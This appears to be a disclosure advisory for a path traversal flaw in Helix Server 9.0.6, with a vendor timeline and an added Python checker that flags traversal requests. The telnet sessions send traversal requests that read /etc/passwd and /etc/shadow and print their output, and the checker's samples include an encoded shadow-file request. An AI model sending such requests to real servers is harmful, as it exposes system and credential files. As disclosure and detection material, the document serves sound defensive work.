RealNetworks Helix Server URI Traversal Arbitrary File Access

Vendor: RealNetworks (http://www.realnetworks.com/)
Product: Helix Server (http://www.realnetworks.com/products/media_delivery.html)
Version: 9.0.6.1262

Exploit details:

    $ telnet 1.2.3.4 80
    Trying 1.2.3.4...
    Connected to 1.2.3.4.
    Escape character is '^]'.
    OPTIONS / RTSP/1.0
    RTSP/1.0 200 OK
    CSeq: 0
    Date: Sat, 15 Mar 2008 00:28:48 GMT
    Server: Helix Server Version 9.0.6.1262 (linux-2.2-libc6-i586-server) (RealServer compatible)
    Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN
    RealChallenge1: c4x0ft2b97ec020481e88d9defa4f707
    StatsMask: 3
    Connection closed by foreign host.

    $ telnet 1.2.3.4 80
    Trying 1.2.3.4...
    Connected to 1.2.3.4.
    Escape character is '^]'.
    GET //./././././../../../../../etc/passwd
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    [..]
    Connection closed by foreign host.

    $ telnet 1.2.3.4 80
    Trying 1.2.3.4...
    Connected to 1.2.3.4.
    Escape character is '^]'.
    GET //./././././../../../../../etc/shadow
    root:HashedPasswdOMG:13885:0:99999:7:::
    bin:*:13187:0:99999:7:::
    daemon:*:13187:0:99999:7:::
    adm:*:13187:0:99999:7:::
    lp:*:13187:0:99999:7:::
    sync:*:13187:0:99999:7:::
    [..]
    Connection closed by foreign host.
    $

Timeline:

Reported to vendor: 2008-06-16
Vendor ack: 2008-06-16
Vendor solution: Fixed with the release of v.11.x (Nov. 2005) and any v.12 in 2006-Q2

Afterthoughts:

This was discovered during a vulnerability assessment. The client was running outdated software. The vulnerability was actually discovered by Nessus: one of the web-server-related plugins fired, tried a traversal and found this.

Real's response and immediate reply (mail, and then a phone call with extensive discussion) were very well handled. Kudos to them for taking security seriously.
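
An added example, not part of the original advisory and not RealNetworks' code: a lexical containment check that a request handler or a log reviewer could apply to request paths such as the one shown above, extended to percent-encoded variants of the same pattern. DOC_ROOT, MAX_DECODE_ROUNDS, the function names and every sample request other than the advisory's own are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/srv/helix/content"  # assumed content root (not from the advisory)
MAX_DECODE_ROUNDS = 3            # assumed limit on nested percent-encoding


def resolve_request_path(raw_path, doc_root=DOC_ROOT):
    """Return the normalised path under doc_root, or None if the request escapes it."""
    # Decode repeatedly so %2e%2e and double-encoded %252e%252e are compared
    # in the form the filesystem would eventually see.
    decoded = raw_path
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(decoded)
    if unquote(decoded) != decoded or "\x00" in decoded:
        return None  # still encoded after the limit, or embedded NUL
    root = posixpath.normpath(doc_root)
    # Collapse "." and ".." lexically, then require the result to stay under
    # the root. A real server should also resolve symlinks (os.path.realpath)
    # before opening the file; this check touches no filesystem.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def flag_traversal(request_lines, doc_root=DOC_ROOT):
    """Return the request lines whose path resolves outside doc_root."""
    flagged = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2:
            continue  # not a "METHOD path [version]" line
        if resolve_request_path(parts[1], doc_root) is None:
            flagged.append(line)
    return flagged


SAMPLE_REQUESTS = [
    "GET //./././././../../../../../etc/passwd",       # request from the advisory
    "GET /media/clip.rm HTTP/1.0",                     # constructed, benign
    "GET /%252e%252e/%252e%252e/etc/shadow HTTP/1.0",  # constructed, double-encoded
    "GET /media/../media/clip.rm HTTP/1.0",            # constructed, stays inside root
]

if __name__ == "__main__":
    for line in flag_traversal(SAMPLE_REQUESTS):
        print("traversal:", line)
```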